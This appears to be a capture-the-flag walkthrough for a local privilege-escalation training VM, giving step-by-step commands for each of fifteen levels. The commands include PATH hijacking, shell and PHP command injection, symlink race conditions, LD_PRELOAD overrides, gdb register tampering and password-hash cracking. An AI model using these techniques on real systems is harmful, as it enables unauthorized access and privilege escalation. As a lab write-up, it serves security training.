# Table of Contents

1.  [Prerequisite :](#orgb3835ce)
2.  [Mandatory part :](#org018d294)
    1.  [Level00](#org7e4ca1d)
    2.  [Level01](#org3270256)
    3.  [Level02](#org3ca2b2b)
    4.  [Level03](#org5bc68d1)
    5.  [Level04](#orgb33b104)
    6.  [Level05](#orgf31906d)
    7.  [Level06](#orgd64a8a3)
    8.  [Level07](#org1e0f570)
    9.  [Level08](#org660a135)
    10. [Level09](#org6907d95)
    11. [Level10](#org092d1b6)
3.  [Bonus part :](#orgaadcc9f)
    1.  [Level11](#orgb73aeef)
    2.  [Level12](#org45ef5c8)
    3.  [Level13](#org4dd74c6)
    4.  [Level14](#org6b8f84f)



<a id="orgb3835ce"></a>

# Prerequisite :

1.  Launch the VM on VirtualBox
2.  Use ssh to connect on the machine with **`ssh level00@localhost -p 4242`** and use &rsquo;level00&rsquo; as password
3.  You&rsquo;re in !


<a id="org018d294"></a>

# Mandatory part :


<a id="org7e4ca1d"></a>

## Level00

In basic enumeration, one of the first thing to do is to check the env and the path variable.

1.  **`env | grep PATH`**
2.  **`cd /usr/sbin/`**
3.  **`ls -la`**
4.  **`cat john`**

It is encrypted with ROT. Use the shell script in the ressources folder to find the password.

Bingo on rot10 !

Use this password to connect on user flag00 with `su - flag00` then use the `getflag` and you have done it for the first flag ! You can use it to switch on level01.


<a id="org3270256"></a>

## Level01

An other basic thing is to check the /etc/passwd file which contains &#x2026;. passwords.

**`cat /etc/passwd`**

We find an other encrypted token &#x2013;> *&rsquo;42hDRfypTqqnw&rsquo;*.

This time we will need to use our friend *john-the-ripper* to break the hash.

If it is not installed, use `brew install john`.

Then, **`john ./level01/ressources/hash.txt --show`**.

Use the decrypted password to log-in as user flag01.

Now it is time for the `getflag` command.

See you on level02 !


<a id="org3ca2b2b"></a>

## Level02

There is a .pcap file in the home directory, we need to open it with wireshark.

To download the file on host:

1.  **`scp -P 4242 level02@localhost:~/level02.pcap .`**
2.  **`chmod a+r level02.pcap`**

Open it with wireshark, if it is not installed then run `brew install wireshark`.

It is a record of an exchange of ethernet packet, righ click on a packet and choose **follow tcp stream**.

The result is incomplete, display the packet in UTF-8.

That&rsquo;s it, the password for the user flag02 is there ! Use it and get the flag.


<a id="org5bc68d1"></a>

## Level03

There is a file in the home directory.

1.  **`file level03`** in order to have more information about this file, we know it&rsquo;s a binary.
2.  **`ls -l level03`** The file permissions contains &rsquo;s&rsquo; which allow the programm to execute a command as the user who owns the file.
3.  **`strings level03`** The binary uses the **`/usr/bin/env echo`** command, this is the exploit. We need to replace this **`echo`** with **`bash`**

Here is the trick :

1.  **`cd /tmp`**
2.  **`echo "/bin/bash" > echo`**
3.  **`chmod 777 echo`**
4.  **`export PATH=/tmp:$PATH`**
5.  **`~/level03`**
6.  **`whoami`**

You know the rest (:


<a id="orgb33b104"></a>

## Level04

There is perl file in the home directory.

**`cat level04.pl`**

There is a webserver on localhost:4747, we can use **`curl`** on it.

`curl "localhost:4747?x=abc"`

It prints the value of the paramater &rsquo;x&rsquo; by assigning it to $y and then use **`echo`**. The parameter of the **`echo`** command is not quoted so we can inject shell command on it.

Try : **``curl "localhost:4747?x=\`getflag\`"``**

Here is your flag.


<a id="orgf31906d"></a>

## Level05

We are infomed that we have a new email, the command **`env`** indicates where is the path of the directory for email.

1.  **`cat /var/mail/level05`**
2.  **`cat /usr/sbin/openarenaserver`**

The &ldquo; \*/2 \* \* \* \* &rdquo; indicates that a cron job is executed every 2 minutes and the script openarenaserver executes all scripts in *opt/openarenaserver* . So let&rsquo;s write a  script.

**`echo "getflag > /var/tmp/flag" > /opt/openarenaserver/exploit`**

Just wait a little and the flag would be in the file flag in /var/tmp.


<a id="orgd64a8a3"></a>

## Level06

There is script that executes the level06.php file that executes a search and replace on the content of a file taken in argument. The goal is to inject a php command in it, the modifier /e on `preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);` execute the result as php code.
I used <https://regex101.com/> in order to understand the pattern in regex and then <https://php-legacy-docs.zend.com/manual/php5/en/reference.pcre.pattern.modifiers> to understand how to exploit it.
Finally the command to inject is `[x {\${system(getflag)}}]`

1.  **`echo "[x {\${system(getflag)}}]" > /var/tmp/exploit`**
2.  **`./level06 /var/tmp/exploit`**

Exploited !


<a id="org1e0f570"></a>

## Level07

There is binary file called level07.

**`strings ./level07`** to have more information

It is executed as flag07 so we need to break it. When executed it displays the username extracted from the env variable &rsquo;LOGNAME&rsquo; and use echo to display it. Since the value of echo (%s) is not quoted then we can exploit it as earlier.

1.  **`export LOGNAME=";/bin/bash"`**
2.  **`./level07`**
3.  **`getflag`**

Next level !


<a id="org660a135"></a>

## Level08

There is binary file that read the content of the file given in arguments. If the file to read is named token then there is error. We need to find a way to change the name of the file &rsquo;token&rsquo;. In order to do this we will use symlink.

1.  **`ln -s /home/user/level08/token /var/tmp/sym`**
2.  **`./level08 /var/tmp/sym`**

Log-in as flag08 with the token and run `getflag` !


<a id="org6907d95"></a>

## Level09

There is a binary file and a token. It is possible to just **`cat`** the token but the output is a little broken. The executable level09 take a string as parameter and hash it with an algorithm. After a few tries it&rsquo;s possible to guess the algorithm, it just use the ASCII table in decimal by adding to each character his position in the string.
For example : 1234 -> 1357
So, I made a little c programm to decryp the hash, it&rsquo;s located in ./level09/ressources folder and called decrypt.c, it takes the file in parameter in order to decrypt properly the hash.

On the host machine :

1.  **`scp -P 4242 level09@localhost:~/token .`**
2.  **`chmod a+r token`**
3.  **`gcc decrypt.c -o decrypt`**
4.  **`./decrypt token`**

Now you can log-in as flag09 in the ssh terminal and then run `getflag`.


<a id="org092d1b6"></a>

## Level10

Again, there is a binary file and a token file. The command **`strings`** on the binary indicates us that it&rsquo;s uses networking functions, indeed, it asks us to send file on host on port 6969 if we have an access and we cannot open token nor download it with `scp`. We need to find a way to download it thanks to the binary.
The command **`strings`** indicates that it uses the function **access** which is vulnerable to race condition.

On the host :

**`nc -lk 6969`**

On the guest :

1.  **`touch /var/tmp/asd`**
2.  **`./level10 /var/tmp/asd [ip host] & ln -sF /home/user/level10/token /var/tmp/asd`**
3.  **`su - flag10`**
4.  **`getflag`**


<a id="orgaadcc9f"></a>

# Bonus part :


<a id="orgb73aeef"></a>

## Level11

There is a LUA script, it serves a connection on localhost on port 5151, when connected on it asks us a password. The idea here is not to find the right password but inject a command.

1.  **`nc 127.0.0.1 5151`**
2.  **`;getflag > /var/tmp/flag`**
3.  **`cat /var/tmp/flag*`**


<a id="org45ef5c8"></a>

## Level12

There is a perl script in the home directory. It serves a server running on port 4646 and seems to be vulnerable to command injection on line 11 **\@output = \`egrep &ldquo;^$xx&rdquo; /tmp/xd 2>&1\`;** cause of the usage of backsticks. However **``perl level12.pl x='`ls`'``** does not work since the scrit capitalizes the argument x, we need to find a way to bypass this, and the key is &rsquo;\*&rsquo;.

By using the wildcard &rsquo;\*&rsquo; we can match a file and execute it.

1.  **`echo "getflag > /var/tmp/flag" > /tmp/EXPLOIT`**
2.  **`chmod 777 /tmp/EXPLOIT`**
3.  **``curl 'localhost:4646?x=`/*/exploit`'``**
4.  **`cat /var/tmp/flag`**


<a id="org4dd74c6"></a>

## Level13

There is a binary file in the directory. The command `file` on it gives us more information of it&rsquo;s format and the command `strings` reveals the tools uses. When executed it displays an error, we don&rsquo;t have the right UID to get the flag. In order to verify the UID it uses the function &rsquo;getuid&rsquo;, so is there a way to override it ? Let&rsquo;s find out.
On this post <https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/Quelques%20astuces%20avec%20LD_PRELOAD.pdf> I learnt about **LD\_PRELOAD**, &rsquo;This can be used to force a library to be loaded and this can be used to alter the way the standard libc calls are processed.&rsquo;

1.  **`cp ./level13 /tmp/`** We copy the executable to remove the setuid permission.
2.  **`cd /tmp`**
3.  **`echo "int getuid(){return 4242;}" > getuid.c`**
4.  **`gcc -fPIC -shared -o lib.so getuid.c`**
5.  **`export LD_PRELOAD="/tmp/lib.so"`**
6.  **`./level13`**


<a id="org6b8f84f"></a>

## Level14

There is nothing in the home directory, after some time enumerating the system, I conclude that we should take a look at the `getflag` command and see if we can cracked it.

**`strace /bin/getflag`**

It displays us some useful information of what the command executes.

Let&rsquo;s run gdb to understand it more.

1.  **`gdb /bin/getflag`**
2.  **`run`**

The programm is stopped, there is a warning. What could triggered this warning ? The `strace` command of earlier gives us the reason, the function `ptrace` return -1 which is opperation not permitted.

1.  **`disass main`**

Indeed, on line 72 it compares the result of the `ptrace` function, so let&rsquo;s modify **eax**.

1.  **`break *main+72`**
2.  **`run`**
3.  **`print $eax`**
4.  **`set $eax=0`**
5.  **`print $eax`**
6.  **`continue`**

Ok, we actually did it but we are still identified as user **level14** and not **flag14**.

1.  **`disass main`**

On line 439, the function `getuid` is called and the line after, **eax** is compared to a value, like we did for `ptrace`, we need to modify the result. Open a new terminal and run ssh on level14, then **`cat /etc/passwd`**. The user we need if **flag14** and his uid is **3014**.

1.  **`break *main+444`**
2.  **`run`**
3.  **`set $eax=0`**
4.  **`continue`**
5.  **`print $eax`**
6.  **`set $eax=3014`**
7.  **`print $eax`**
8.  **`continue`**

Here is the token ! You can log-in as flag14 and that&rsquo;s it !

